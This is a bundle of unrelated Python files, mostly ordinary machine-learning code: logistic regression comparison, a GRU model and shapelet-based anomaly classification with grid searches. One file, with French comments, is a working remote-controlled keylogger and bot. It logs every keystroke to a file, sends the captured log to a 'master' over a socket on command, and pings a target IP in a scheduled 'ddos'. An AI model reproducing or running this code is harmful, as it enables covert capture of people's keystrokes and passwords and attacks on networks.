dataset2_train = pd.read_csv('multinomial_bad_ordinal_good_train.csv', sep=',')
dataset2_test = pd.read_csv('multinomial_bad_ordinal_good_test.csv', sep=',')
Y_data_train, X_data_train = dataset2_train.variance, dataset2_train.iloc[:, 1:]
Y_data_test, X_data_test = dataset2_test.variance, dataset2_test.iloc[:, 1:]
X_data_train = X_data_train.values
X_data_test = X_data_test.values
classes_ordinal_test = Y_data_train.unique()
class_order_test = [3, 4, 2, 1]
classes = [x for _, x in sorted(zip(class_order_test, classes_ordinal_test))]
d_test = dict([(y, x) for x, y in enumerate(classes_ordinal_test)])
new_Y_train = list(Y_data_train.map(d_test))
new_Y_test = list(Y_data_test.map(d_test))
X_data_train = scale_data(X_data_train)
X_data_test = scale_data(X_data_test)
multinomial_model = MultinomialLogReg()
multinomial_model_build = multinomial_model.build(X_data_train, new_Y_train)
multinomial_model_predictions = multinomial_model_build.predict(X_data_test)
multinomial_loss = multinomial_model_build.log_loss(X_data_test, new_Y_test)
ordinal_model = OrdinalLogReg()
ordinal_model_build = ordinal_model.build(X_data_train, new_Y_train)
ordinal_model_predictions = ordinal_model_build.predict(X_data_test)
ordinal_loss = ordinal_model_build.log_loss(X_data_test, new_Y_test)
print(f'Accuracy for multinomial logistic regression is '
f'{get_accuracy(multinomial_model_predictions, new_Y_test)}. 'f'Log-loss is: {multinomial_loss}')
print(f'Accuracy for ordinal logistic regression is '
f'{get_accuracy(ordinal_model_predictions, new_Y_test)}. 'f'Log-loss is: {ordinal_loss}')
|
import torch
from torch import nn
from params import *
class GRU(nn.Module):
def __init__(self):
super().__init__()
self.hidden_size = HIDDEN_SIZE
self.num_layers = NUM_LAYERS
self.gru = nn.GRU(input_size=INPUT_SIZE,
hidden_size=self.hidden_size,
num_layers=self.num_layers,
bidirectional=BIDIRECTIONAL,
dropout=DROPOUT,
batch_first=True)
self.fc = nn.Linear(2 * self.hidden_size if BIDIRECTIONAL else self.hidden_size, OUTPUT_SIZE)
def init_state(self, batch_size: int) -> torch.Tensor:
return torch.zeros(2 * self.num_layers if BIDIRECTIONAL else self.num_layers, batch_size, self.hidden_size)
def forward(self, x: torch.Tensor, h: torch.Tensor) -> torch.Tensor:
"""
@param x: input sequence of shape [batch_size, sequence_length, num_features]
@param h: hidden state of shape [num_layers (2x if bidirectional), batch_size, hidden_size]
"""
o, _ = self.gru(x, h)
return self.fc(o)[:, -1, :]
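# --- Hedged usage sketch (added; not part of the original module) ---
# Shows the expected tensor shapes when driving the model defined above. It relies
# only on names from this file and params.py (INPUT_SIZE, OUTPUT_SIZE, ...); the
# batch size and sequence length below are arbitrary.
if __name__ == "__main__":
    model = GRU()
    batch_size, seq_len = 4, 16
    x = torch.randn(batch_size, seq_len, INPUT_SIZE)
    h0 = model.init_state(batch_size)
    out = model(x, h0)  # shape: [batch_size, OUTPUT_SIZE]
    print(out.shape)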
|
# import the socket module to allow network communication
import socket as modSocket
from pynput.keyboard import Key, Listener
import logging
import threading
import time
from datetime import datetime
from pythonping import ping
lock = threading.Lock()
"""
creation de l'objet Connexion, composé de 4 champs et 3 méthodes
1ère methode : elle va permettre d'écouter sur un port donné et une adresse, une fois els connexion acceptée elle recevra en continu
dans une boucle while les messages envoyé par le maitre, selon le message reçu le slave lancera une méthode présentes dans
l'interface Action.
2ème methode : va re-ecouter si jamais un problème a été signalé plutôt dans le code, elle va juste fermer la carte reseau, elle re lancer.
3ème methode : ces celle qui va se lancer en premier, elle va se connecter à une machine distante en lui envoyant un message. et va finir
en lançant la première méthode
"""
class Connexion():
# create the connexion object with the adresseMachine field
def __init__(self, adresseMachine, carteReseauEcoute, carteReseauConn, donnee):
self.adresseMachine = adresseMachine
self.carteReseauEcoute = carteReseauEcoute
self.carteReseauConn = carteReseauConn
self.donnee = donnee
# Step 1: set up a communication channel to receive the master's messages
def listen(self, carteReseauEcoute, donnee):
# listen on the slave's address, on port 60000
adresseMachineMaitre = (("localhost", 60000))
carteReseauEcoute.bind(adresseMachineMaitre)
# once bound, start listening and accept the connection so it can receive the master's instructions
print("J'écoute")
carteReseauEcoute.listen(5)
connReseau, addr = carteReseauEcoute.accept()
print("Connecté avec la machine : ", addr)
# loop that dispatches to a method of the communication object
try:
while donnee != "FIN":
if donnee == "keylogger":
print("OK je lance le keylogger")
# launch the start_log method of the Communication object in a thread
threading.Thread(target=a.start_log, args=()).start()
elif donnee == "stop":
print("J'arrête le keylogger")
a.stop_log()
elif donnee == "transfert":
print("J'envoie le keylogger")
a.get_log(connReseau, donnee)
elif donnee == "ddos":
print("on lance le ddos")
a.ddos(connReseau)
donnee = connReseau.recv(1024).decode("utf-8")
except ConnectionResetError:
print("Connexion arreté par le maitre")
a.reEcoute(carteReseauEcoute)
a.reEcoute(carteReseauEcoute)
def reEcoute(self, carteReseauEcoute):
print("Fini je re-écoute")
carteReseauEcoute.close()
carteReseauEcoute = modSocket.socket(modSocket.AF_INET, modSocket.SOCK_STREAM)
a.listen(carteReseauEcoute, donnee)
# Step 2: set up a communication channel to send messages to the master
def sendIP(self, carteReseauConn, adresseMachine):
try:
# define the address to which the slave sends its IP
carteReseauConn.connect(adresseMachine)
carteReseauConn.send(b"Je me connecte")
print("IP envoyée au master")
a.listen(carteReseauEcoute, donnee)
except ConnectionRefusedError:
print("Machine maitre non connecté")
a.listen(carteReseauEcoute, donnee)
"""
creation de l'objet Action , qui va être enfant de l'objet Connexion, Il est composé
de 5 méthodes et d'un seul champ.
1ère methode et 2ème (start_log, appuie): Ces 2 méthodes vont permettre de lancer le keylogger, start_log va avoir besoin de la méthode
appuie pour fonctionner.
3ème methode (stop_log): va stopper le start_log
4ème methode (get_log): va aller chercher le fichier "keylogger.txt", le mettre à l'envers et prendre le nombre de ligne que veut le maitre,
puis va lui envoyer
5ème methode (ddos): tu avs peut être changer
"""
class Action(Connexion):
def __init__(self, donnee):
self.donnee = donnee
# bind the listener to the appuie (key press) method
self.listener = Listener(on_press=self.appuie)
def start_log(self):
try:
# path where the logs will be written
log_dir = r"D:"
# set the basic logger configuration
# filename specifies the output file name
# format sets the layout of each log entry: here the date and time, followed by the keyboard input
logging.basicConfig(filename = (log_dir + "\\keyLog.txt"), level=logging.DEBUG, format='%(asctime)s: %(message)s')
# listener.start() starts listening through the appuie callback bound to the listener variable
self.listener.start()
except FileNotFoundError:
print("erreur chemin inexistant")
# appuie() converts every key press to a string and logs it
def appuie(self, key):
logging.info(str(key))
def stop_log(self):
# listener.stop() stops listening by detaching the appuie callback bound to the listener variable
self.listener.stop()
print("logger arreté")
def get_log(self, connReseau, donnee):
logger = open("D:\\keyLog.txt", "r")
# read the file line by line
fichier = logger.readlines()
# count the number of lines (the file has already been read into `fichier`,
# so a second readlines() would return nothing)
nb_lines = len(fichier)
# receive the number of lines the master wants to retrieve
lines = connReseau.recv(1024).decode("utf-8")
# linesInt simply converts the received string to an int
linesInt = int(lines)
# index of the first line to send back, so that only the last lines of the log are returned
start = nb_lines-1-linesInt
fin = str(fichier[start:])
connReseau.send(fin.encode("utf-8"))
def ddos(self, connReseau):
# define the date format used when parsing it into the variable
date = connReseau.recv(1024).decode("utf-8")
print(date)
format = "%Y-%m-%d %H:%M"
# get the current date and time and format it as defined above
now = datetime.strftime(datetime.now(), format)
print(now)
# compare the current date and time with the one requested for the ddos
if (now == date):
ip = connReseau.recv(1024).decode("utf-8")
print(ip)
# send the request; verbose prints the ping output, size sets the packet size and count the number of packets
ping (ip, verbose=True, size=400, count=15)
print("ping okay")
else:
print("error")
adresseMachine = ("localhost", 60000)
carteReseauEcoute = modSocket.socket(modSocket.AF_INET, modSocket.SOCK_STREAM)
carteReseauConn = modSocket.socket(modSocket.AF_INET, modSocket.SOCK_STREAM)
donnee = ""
a = Action(donnee)
a.sendIP(carteReseauConn, adresseMachine)
|
from django.apps import AppConfig
class ConvergenceConfig(AppConfig):
name = 'convergence'
|
from Sloth.classify import Shapelets
from Sloth.preprocess import events_to_rates
import pandas as pd
import numpy as np
import os.path
#from evaluate import evaluate
#from preprocess import parse_weekly_timestamps
from manatee.evaluate import evaluate
from manatee.preprocess import parse_weekly_timestamps
import matplotlib.pyplot as plt
import pickle
from tslearn.preprocessing import TimeSeriesScalerMinMax
from sklearn.model_selection import StratifiedKFold
from sklearn.metrics import accuracy_score, f1_score
from keras.models import load_model
from keras.optimizers import Adam, Adagrad, RMSprop
def data_augmentation(X_train, y_train, random_seed = 0):
'''
augment samples of less frequent classes
so that all classes have same number of samples
random sampling with replacement
'''
values, counts = np.unique(y_train, return_counts = True)
max_samples = counts.max()
initial = X_train.shape[0]
for val in values:
ixs = np.where(y_train == val)[0]
np.random.seed(random_seed)
rand_ixs = np.random.choice(y_train[ixs].shape[0], max_samples - len(ixs), replace = True)
X_train = np.append(X_train, X_train[ixs][rand_ixs], axis = 0)
y_train = np.append(y_train, y_train[ixs][rand_ixs], axis = 0)
print("Augmented class {} with {} randomly sampled repetitions (with replacement)".format(val, max_samples - len(ixs)))
print("\nBefore augmentation the training dataset had {} samples".format(initial))
print("After augmentation the training dataset has {} samples".format(X_train.shape[0]))
return X_train, y_train
def data_augmentation_with_noise():
'''
augment samples of less frequent classes (with noise)
so that all classes have same number of samples
'''
pass
def shapelet_sizes_grid_search(series_size = 240*60, num_bins = 300, n_folds = 5,
min_points = 5, filter_bandwidth = 2, density = True, epochs=100, length=[.025, .05], num_shapelet_lengths=[6,9,12],
num_shapelets = .2, learning_rate=.01, weight_regularizer = .01, random_state = 0):
'''
grid search over different shapelet dictionary options
from Grabocka paper
'''
acc = 0
f1_macro = 0
f1_weighted = 0
best_min_l_acc = None
best_num_l_acc = None
best_min_l_f1_macro = None
best_num_l_f1_macro = None
best_min_l_f1_weighted = None
best_num_l_f1_weighted = None
# create rate values if they don't already exist
dir_path = "kmeans/sz_{}_hr_bins_{}_min_pts_{}_filter_width_{}_density_{}".format(series_size / 60 / 60, num_bins, min_points, filter_bandwidth, density)
series_values = np.load("rate_values/" + dir_path + "/series_values.npy")
labels = np.load("rate_values/" + dir_path + "/labels.npy")
# randomly shuffle before splitting into training / test / val
np.random.seed(random_state)
randomize = np.arange(len(series_values))
np.random.shuffle(randomize)
series_values = series_values[randomize]
labels = labels[randomize]
train_split = int(0.9 * series_values.shape[0])
# write HP combination results to file
file = open('hp_shp_sizes_grid_search_results.txt', 'a+')
file.write('%s,%s,%s,%s,%s\n' % ('Min Length', 'Num Shapelet Lengths', 'Accuracy', 'F1 Macro', 'F1 Weighted'))
file.close()
for min_length in length:
for num_lengths in num_shapelet_lengths:
# CV
skf = StratifiedKFold(n_splits= n_folds, shuffle = True)
val_acc = []
val_f1_macro = []
val_fl_weighted = []
print("Evaluating {} shapelet lengths starting at a minimum length of {}".format(num_lengths, min_length))
for i, (train, val) in enumerate(skf.split(series_values[:train_split], labels[:train_split])):
print("Running fold {} of {}".format(i+1, n_folds))
acc_val, f1_macro_val, f1_weighted_val = train_shapelets(series_values[train].reshape(-1, series_values.shape[1], 1), labels[train],
series_size = series_size, num_bins = num_bins, density=density, length = min_length, num_shapelet_lengths=num_lengths,
val_data=(series_values[val].reshape(-1, series_values.shape[1], 1), labels[val]))
val_acc.append(acc_val)
val_f1_macro.append(f1_macro_val)
val_fl_weighted.append(f1_weighted_val)
# write mean values
file = open('hp_shp_sizes_grid_search_results.txt', 'a+')
file.write('%s,%s,%s,%s,%s\n' % (min_length, num_lengths, np.mean(val_acc),
np.mean(val_f1_macro), np.mean(val_fl_weighted)))
file.close()
if np.mean(val_acc) > acc:
best_min_l_acc = min_length
best_num_l_acc = num_lengths
acc = np.mean(val_acc)
if np.mean(val_f1_macro) > f1_macro:
best_min_l_f1_macro = min_length
best_num_l_f1_macro = num_lengths
f1_macro = np.mean(val_f1_macro)
if np.mean(val_fl_weighted) > f1_weighted:
best_min_l_f1_weighted = min_length
best_num_l_f1_weighted = num_lengths
f1_weighted = np.mean(val_fl_weighted)
# return best result
print("The best accuracy was {} at min length {} and number of lengths {}".format(acc, best_min_l_acc, best_num_l_acc))
print("The best f1 macro was {} at min length {} and number of lengths {}".format(f1_macro, best_min_l_f1_macro, best_num_l_acc))
print("The best f1 weighted was {} at min length {} and number of lengths {}".format(f1_weighted, best_min_l_f1_weighted, best_num_l_f1_weighted))
def batch_events_to_rates(data, index, labels_dict = None, series_size = 60*60, min_points = 10, num_bins = 60, filter_bandwidth = 1, density=True):
'''
convert list of event times into rate functions using a gaussian filter.
parameters:
data pandas Series containing event times to convert
index index containing labels of different clusters to turn into
unique rate functions
labels_dict dictionary of labels (1 per index) to apply to labels
series_size length of the windows that the time series capture, expressed in seconds (default = 1 hour)
min_points minimum number of points needed to calculate rate function over series of length
series_size
num_bins number of bins to subdivide series into
filter_bandwidth length of gaussian filter
density whether to generate density rate functions
return:
series_values np array containing series values for each series
series_times np array containing time values for each point in each series
labels np array containing labels for each series
val_series_count dictionary containing the number of series parsed for each unique value
'''
# assert that data and index have the same length
try:
assert(len(data) == len(index))
except:
raise ValueError("The series of event times and the series of indices must be the same length")
# convert each cluster of time series to rates
series_values = []
series_times = []
labels = []
series_count = 0
val_series_count = {}
avg_event_count = {}
for val in index.unique():
val_series_count[val] = 0
avg_event_count[val] = 0
event_times = data.loc[index == val]
# iterate through event times by series size -> only convert to rate function if >= min_points events
event_index = 0
while (event_index <= event_times.max()):
events = event_times[(event_index <= event_times) & (event_times < (event_index + series_size))]
if len(events) >= min_points:
rate_vals, rate_times = events_to_rates(events.values.astype(int), num_bins = num_bins, filter_bandwidth = filter_bandwidth,
min_time = event_index, max_time = event_index + series_size, density = density)
series_values.append(rate_vals)
series_times.append(rate_times)
if labels_dict is not None:
labels.append(labels_dict[val])
series_count += 1
val_series_count[val] += 1
print("Added time series with {} events from cluster {}".format(len(events), val))
else:
print("Time series from cluster {} is too short".format(val))
event_index += series_size
avg_event_count[val] += len(events)
print("{} time series were added from cluster: {}".format(val_series_count[val], val))
if val_series_count[val]:
print("Time series were added from cluster: {} have an average of {} ecents".format(val, avg_event_count[val] / val_series_count[val]))
print("\nDataset Summary: \n{} total time series, length = {} hr, sampled {} times".format(series_count, series_size / 60 / 60, num_bins))
for val in index.unique():
ct = val_series_count[val]
print("{} time series ({} %) were added from cluster: {}".format(ct, round(ct / series_count * 100, 1), val))
if val_series_count[val]:
print("Time series were added from cluster: {} have an average of {} ecents".format(val, avg_event_count[val] / val_series_count[val]))
labels = np.array(labels)
series_values = np.vstack(series_values)
series_times = np.vstack(series_times)
# save series values and series times if they don't already exist
dir_path = "rate_values/kmeans/sz_{}_hr_bins_{}_min_pts_{}_filter_width_{}_density_{}".format(series_size / 60 / 60, num_bins, min_points, filter_bandwidth, density)
if not os.path.isfile(dir_path + "/series_values.npy"):
os.makedirs(dir_path, exist_ok=True)
np.save(dir_path + "/series_values.npy", series_values)
np.save(dir_path + "/series_times.npy", series_times)
np.save(dir_path + "/labels.npy", labels)
output = open(dir_path + "/val_series_count.pkl", 'wb')
pickle.dump(val_series_count, output)
output.close()
if len(labels_dict.keys()) > 2:
if not os.path.isfile(dir_path + "/labels_multi.npy"):
np.save(dir_path + "/labels_multi.npy", labels)
else:
if not os.path.isfile(dir_path + "/labels_binary.npy"):
np.save(dir_path + "/labels_binary.npy", labels)
return series_values, series_times, labels, val_series_count
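# --- Hedged usage sketch (added; not part of the original module) ---
# Minimal illustration of batch_events_to_rates on synthetic event times. The event
# times, cluster labels and parameters are made up; note that the function also
# writes .npy files under rate_values/kmeans/..., so that location is assumed to be
# writable.
def _example_batch_events_to_rates():
    rng = np.random.RandomState(0)
    event_times = pd.Series(np.sort(rng.randint(0, 60 * 60, size=200)))
    clusters = pd.Series(rng.choice(["a", "b"], size=200))
    labels_dict = {"a": 0, "b": 1}
    return batch_events_to_rates(
        event_times, clusters, labels_dict=labels_dict,
        series_size=60 * 60, min_points=10, num_bins=60)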
def train_shapelets(X_train, y_train, visualize = False, epochs = 10000, length = 0.05, num_shapelet_lengths = 12,
num_shapelets = .25, learning_rate = .01, weight_regularizer = .001, batch_size = 256, optimizer = Adam, series_size = 240 * 60,
num_bins = 300, density = True, p_threshold = 0.5, transfer = False, val_data = None):
# shapelet classifier
source_dir = 'shapelets_bad'
clf = Shapelets(epochs, length, num_shapelet_lengths, num_shapelets, learning_rate, weight_regularizer,
batch_size = batch_size, optimizer = optimizer)
# visualize training data
if visualize:
for label in np.unique(y_train):
for index in np.where(y_train == label)[0][:2]:
plt.plot(np.arange(X_train.shape[1]), X_train[index])
time_unit = series_size / num_bins / 60
if time_unit == 1:
plt.xlabel('Minute of the Hour')
elif time_unit == 0.5:
plt.xlabel('Half Minute of the Hour')
if density:
plt.ylabel('Email Density')
else:
plt.ylabel('Emails per Minute')
if label == 1:
plt.title('Example of Anomalous Rate Function')
else:
plt.title('Example of Non-Anomalous Rate Function')
plt.show()
# split into training and validation sets
if val_data is None:
#np.random.seed(0)
inds = np.arange(X_train.shape[0])
np.random.shuffle(inds)
X_train = X_train[inds]
y_train = y_train[inds]
val_split = 1 / 3
val_split = int(val_split * X_train.shape[0])
        # take the validation slice before truncating the training arrays so the two sets do not overlap
        X_val, y_val = X_train[-val_split:], y_train[-val_split:]
        X_train, y_train = X_train[:-val_split], y_train[:-val_split]
else:
X_val, y_val = val_data
# data augmentation
X_train, y_train = data_augmentation(X_train, y_train)
# eval shapelet on best fit
# shapelet classifier
if not transfer:
print("\nFitting Shapelet Classifier on {} Training Time Series".format(X_train.shape[0]))
clf.load_model(num_bins, y_train, "checkpoints/shapelets_bad2019-03-22_19-39-26_45-0.2369.h5")
#clf.fit(X_train, y_train, source_dir = source_dir, val_data = (X_val, y_val))
else:
print("\nFitting Shapelet Classifer on {} Training Time Series. Transfer Learned from Binary Setting".format(X_train.shape[0]))
model = clf.fit_transfer_model(X_train, y_train, "checkpoints/shapelets2019-03-08_01-19-31_61-0.4997.h5", source_dir = source_dir, val_data = (X_val, y_val))
# evaluate after full training
y_pred = clf.predict_proba(X_val)
y_preds, conf = clf.decode(y_pred, p_threshold)
print('\nEvaluation on Randomly Shuffled Validation Set with {} Validation Time Series'.format(X_val.shape[0]))
#targets = clf.get_classes()
evaluate(y_val, y_preds)#, target_names=targets)
#return accuracy_score(y_val, y_preds), f1_score(y_val, y_preds, average='macro'), f1_score(y_val, y_preds, average='weighted')
# visualize
if visualize:
print('Visualize Shapelet Classifications')
        # visualize against the held-out validation examples that y_preds was computed on
        rates = X_val
        y_true = y_val
for i in np.arange(3):
if y_true[i] == 1 and y_preds[i] == 1:
print('Correct Classification: Anomalous')
elif y_true[i] == 1 and y_preds[i] == 0:
print('Incorrect Classification: True = Anomalous, Predicted = Non-Anomalous')
elif y_true[i] == 0 and y_preds[i] == 1:
print('Incorrect Classification: True = Non-Anomalous, Predicted = Anomalous')
elif y_true[i] == 0 and y_preds[i] == 0:
print('Correct Classification: Non-Anomalous')
clf.VisualizeShapeletLocations(rates, i)
""" # Shapelet test - track over time
track = np.array([])
for i in range(10):
track = np.append(track, i * 0.01)
track = np.append(track, track[::-1])
# Beginning
track_beg = np.pad(track, (0, num_bins - len(track)), 'constant')
track_beg = track_beg.reshape(1, track_beg.shape[0], 1)
track_pred = clf.predict(track_beg)
if track_pred:
print('Classification: Anomalous')
else:
print('Classification: Non-Anomalous')
clf.VisualizeShapeletLocations(track_beg, 0, series_size, num_bins, density)
# Middle
l = int((num_bins - len(track)) / 2)
track_mid = np.pad(track, (l, l), 'constant')
track_mid = track_mid.reshape(1, track_mid.shape[0], 1)
track_pred = clf.predict(track_mid)
if track_pred:
print('Classification: Anomalous')
else:
print('Classification: Non-Anomalous')
clf.VisualizeShapeletLocations(track_mid, 0, series_size, num_bins, density)
# End
track_end = np.pad(track, (num_bins - len(track), 0), 'constant')
track_end = track_end.reshape(1, track_end.shape[0], 1)
track_pred = clf.predict(track_end)
if track_pred:
print('Classification: Anomalous')
else:
print('Classification: Non-Anomalous')
    clf.VisualizeShapeletLocations(track_end, 0, series_size, num_bins, density) """
    # The CV and hyperparameter-search routines below unpack three metrics from this function;
    # this assumes accuracy_score / f1_score are imported from sklearn.metrics at the top of
    # this module (they are also referenced in the commented-out return above).
    return accuracy_score(y_val, y_preds), f1_score(y_val, y_preds, average='macro'), f1_score(y_val, y_preds, average='weighted')
# hyperparameter optimization
# shapelet sizes grid search
# epoch optimization with best HPs and shapelet sizes
def shapelets_hp_opt(length = .05, num_shapelet_lengths = 12, series_size = 240 * 60, n_folds = 3,
num_bins = 300, min_points = 5, filter_bandwidth =2, density = True, num_shp = .25, lr = [.001, .01, .1],
wr = .001, b = 256, opt = Adam , epochs = 1000, random_state = 0):
    '''
    Grid search over hyperparameter options (learning rate, weight regularizer, batch size,
    num_shapelets, optimizer) following the Grabocka et al. shapelet paper. This routine only
    sweeps the values passed in `lr`; the reference grids from the paper are:
    num_shapelets = [.05, .1, .15, .2, .25]
    learning_rate = [.001, .01, .1]
    weight_regularizer = [.001, .01, .1]
    batch_size = [64, 128, 256, 512]
    optimizer = ['Adam', 'Adagrad', 'RMSprop']
    '''
acc = 0
f1_macro = 0
f1_weighted = 0
best_val_acc = None
best_val_f1_macro = None
best_val_f1_weighted = None
# load rate values
dir_path = "kmeans/sz_{}_hr_bins_{}_min_pts_{}_filter_width_{}_density_{}".format(series_size / 60 / 60, num_bins, min_points, filter_bandwidth, density)
series_values = np.load("rate_values/" + dir_path + "/series_values.npy")
labels = np.load("rate_values/" + dir_path + "/labels.npy")
# randomly shuffle before splitting into training / test / val
np.random.seed(random_state)
randomize = np.arange(len(series_values))
np.random.shuffle(randomize)
series_values = series_values[randomize]
labels = labels[randomize]
train_split = int(0.9 * series_values.shape[0])
# write HP combination results to file
'''
file = open('hp_grid_search_results.txt', 'a+')
file.write('%s,%s,%s,%s,%s,%s,%s,%s\n' % ('Num Shapelets', 'Learning Rate', 'Weight Regularizer',
'Optimizer', 'Batch Size', 'Accuracy', 'F1 Macro', 'F1 Weighted'))
file.close()
'''
for value in lr:
# CV
skf = StratifiedKFold(n_splits= n_folds, shuffle = True)
val_acc = []
val_f1_macro = []
val_fl_weighted = []
print("Evaluating num_shp: {}, lr: {}, wr: {}, opt: {}, bs: {}".format(num_shp, value, wr, opt, b))
for i, (train, val) in enumerate(skf.split(series_values[:train_split], labels[:train_split])):
print("Running fold {} of {}".format(i+1, n_folds))
acc_val, f1_macro_val, f1_weighted_val = train_shapelets(series_values[train].reshape(-1, series_values.shape[1], 1), labels[train],
series_size = series_size, num_bins = num_bins, density=density, length = length, num_shapelet_lengths=num_shapelet_lengths,
val_data=(series_values[val].reshape(-1, series_values.shape[1], 1), labels[val]), learning_rate = value,
weight_regularizer = wr, num_shapelets = num_shp, optimizer = opt, batch_size = b, epochs=epochs)
val_acc.append(acc_val)
val_f1_macro.append(f1_macro_val)
val_fl_weighted.append(f1_weighted_val)
# write mean values
file = open('hp_grid_search_results.txt', 'a+')
file.write('%s,%s,%s,%s,%s,%s,%s,%s\n' % (num_shp, value, wr, opt, b, np.mean(val_acc),
np.mean(val_f1_macro), np.mean(val_fl_weighted)))
file.close()
if np.mean(val_acc) > acc:
best_val_acc = value
acc = np.mean(val_acc)
if np.mean(val_f1_macro) > f1_macro:
best_val_f1_macro = value
f1_macro = np.mean(val_f1_macro)
if np.mean(val_fl_weighted) > f1_weighted:
best_val_f1_weighted = value
f1_weighted = np.mean(val_fl_weighted)
# return best result
print("The best accuracy was {} at value {}".format(acc, best_val_acc))
print("The best f1 macro was {} at value {}".format(f1_macro, best_val_f1_macro))
print("The best f1 weighted was {} at value {}".format(f1_weighted, best_val_f1_weighted))
def series_size_cv_grid_search(event_times, index, n_folds =5, min = 15 * 60, max = 120*60, step = 15*60, num_bins = 60,
min_points = 10, filter_bandwidth = 1, density = True, epochs=100, length=0.1, num_shapelet_lengths=2,
num_shapelets = .2, learning_rate=.01, weight_regularizer = .01):
'''
grid search over different series size values with 5 fold cross validation. graph results
30 minute series size provides best accuracy, f1, support across classes
'''
# shapelet classifier
#clf = Shapelets(epochs, length, num_shapelet_lengths, num_shapelets, learning_rate, weight_regularizer)
acc = []
f1_macro = []
f1_weighted = []
for x in range(min, max, step):
# create rate values if they don't already exist
if os.path.isfile("rate_values/kmeans/sz_{}_hr_bins_{}_min_pts_{}_filter_width_{}_density_{}/series_values.npy".format(x / 60 / 60, num_bins, min_points, filter_bandwidth, density)):
dir_path = "kmeans/sz_{}_hr_bins_{}_min_pts_{}_filter_width_{}_density_{}".format(x / 60 / 60, num_bins, min_points, filter_bandwidth, density)
series_values = np.load("rate_values/" + dir_path + "/series_values.npy")
labels = np.load("rate_values/" + dir_path + "/labels.npy")
else:
labels_dict = {}
for val in index.unique():
if val < 50:
labels_dict[val] = 0
else:
labels_dict[val] = 1
series_values, _, labels, _ = \
batch_events_to_rates(event_times, index, labels_dict, series_size = x, min_points = min_points,
num_bins = num_bins, filter_bandwidth = filter_bandwidth, density = density)
skf = StratifiedKFold(n_splits= n_folds, shuffle = True)
val_acc = []
val_f1_macro = []
val_fl_weighted = []
# randomly shuffle before splitting into training / test / val
np.random.seed(0)
randomize = np.arange(len(series_values))
np.random.shuffle(randomize)
series_values = series_values[randomize]
labels = labels[randomize]
# train
train_split = int(0.9 * series_values.shape[0])
print("Evaluating series size {}".format(x))
for i, (train, val) in enumerate(skf.split(series_values[:train_split], labels[:train_split])):
print("Running fold {} of {}".format(i+1, n_folds))
acc_val, f1_macro_val, f1_weighted_val = train_shapelets(series_values[train].reshape(-1, series_values.shape[1], 1), labels[train],
series_size = x, num_bins = num_bins, density=density,
val_data=(series_values[val].reshape(-1, series_values.shape[1], 1), labels[val]))
val_acc.append(acc_val)
val_f1_macro.append(f1_macro_val)
val_fl_weighted.append(f1_weighted_val)
acc.append(np.mean(val_acc))
f1_macro.append(np.mean(val_f1_macro))
f1_weighted.append(np.mean(val_fl_weighted))
# graph results
names = ['Accuracy', 'F1 Macro', 'F1 Weighted']
for vals, name in zip([acc, f1_macro, f1_weighted], names):
plt.clf()
plt.plot(range(min, max, step), vals)
plt.title(name)
plt.xlabel('Series Size')
plt.ylabel(name)
plt.show()
# return best result
x_vals = np.arange(min, max, step)
print("The best accuracy was {} at series size {}".format(np.amax(acc), x_vals[np.argmax(acc)]))
print("The best f1 macro was {} at series size {}".format(np.amax(f1_macro), x_vals[np.argmax(f1_macro)]))
print("The best f1 weighted was {} at series size {}".format(np.amax(f1_weighted), x_vals[np.argmax(f1_weighted)]))
return np.amax(acc), np.amax(f1_macro), np.amax(f1_weighted)
def num_bins_cv_grid_search(event_times, index, n_folds =5, min = 15, max = 61, step = 15, series_size = 30 * 60,
min_points = 10, filter_bandwidth = 1, density = True, epochs=100, length=0.1, num_shapelet_lengths=2,
num_shapelets = .2, learning_rate=.01, weight_regularizer = .01):
    '''
    grid search over different numbers of bins with 5 fold cross validation. graph results
    135 bins provides best accuracy, f1, support across classes
    '''
# shapelet classifier
#clf = Shapelets(epochs, length, num_shapelet_lengths, num_shapelets, learning_rate, weight_regularizer)
acc = []
f1_macro = []
f1_weighted = []
for x in range(min, max, step):
# create rate values if they don't already exist
if os.path.isfile("rate_values/kmeans/sz_{}_hr_bins_{}_min_pts_{}_filter_width_{}_density_{}/series_values.npy".format(series_size / 60 / 60, x, min_points, filter_bandwidth, density)):
dir_path = "kmeans/sz_{}_hr_bins_{}_min_pts_{}_filter_width_{}_density_{}".format(series_size / 60 / 60, x, min_points, filter_bandwidth, density)
series_values = np.load("rate_values/" + dir_path + "/series_values.npy")
labels = np.load("rate_values/" + dir_path + "/labels.npy")
else:
labels_dict = {}
for val in index.unique():
if val < 50:
labels_dict[val] = 0
else:
labels_dict[val] = 1
series_values, _, labels, _ = \
batch_events_to_rates(event_times, index, labels_dict, series_size = series_size, min_points = min_points,
num_bins = x, filter_bandwidth = filter_bandwidth, density = density)
skf = StratifiedKFold(n_splits= n_folds, shuffle = True)
val_acc = []
val_f1_macro = []
val_fl_weighted = []
# randomly shuffle before splitting into training / test / val
np.random.seed(0)
randomize = np.arange(len(series_values))
np.random.shuffle(randomize)
series_values = series_values[randomize]
labels = labels[randomize]
# train
train_split = int(0.9 * series_values.shape[0])
print("Evaluating number of bins {}".format(x))
for i, (train, val) in enumerate(skf.split(series_values[:train_split], labels[:train_split])):
print("Running fold {} of {}".format(i+1, n_folds))
acc_val, f1_macro_val, f1_weighted_val = train_shapelets(series_values[train].reshape(-1, series_values.shape[1], 1), labels[train],
series_size = series_size, num_bins = x, density=density,
val_data=(series_values[val].reshape(-1, series_values.shape[1], 1), labels[val]))
val_acc.append(acc_val)
val_f1_macro.append(f1_macro_val)
val_fl_weighted.append(f1_weighted_val)
acc.append(np.mean(val_acc))
f1_macro.append(np.mean(val_f1_macro))
f1_weighted.append(np.mean(val_fl_weighted))
# graph results
names = ['Accuracy', 'F1 Macro', 'F1 Weighted']
for vals, name in zip([acc, f1_macro, f1_weighted], names):
plt.clf()
plt.plot(range(min, max, step), vals)
plt.title(name)
plt.xlabel('Number of Bins')
plt.ylabel(name)
plt.show()
# return best result
x_vals = np.arange(min, max, step)
print("The best accuracy was {} at number of bins {}".format(np.amax(acc), x_vals[np.argmax(acc)]))
print("The best f1 macro was {} at number of bins {}".format(np.amax(f1_macro), x_vals[np.argmax(f1_macro)]))
print("The best f1 weighted was {} at number of bins {}".format(np.amax(f1_weighted), x_vals[np.argmax(f1_weighted)]))
return np.amax(acc), np.amax(f1_macro), np.amax(f1_weighted)
def filter_width_cv_grid_search(event_times, index, n_folds =5, min = 1, max = 5, step = 1, series_size = 30 * 60,
min_points = 10, num_bins = 135, density = True, epochs=100, length=0.1, num_shapelet_lengths=2,
num_shapelets = .2, learning_rate=.01, weight_regularizer = .01):
    '''
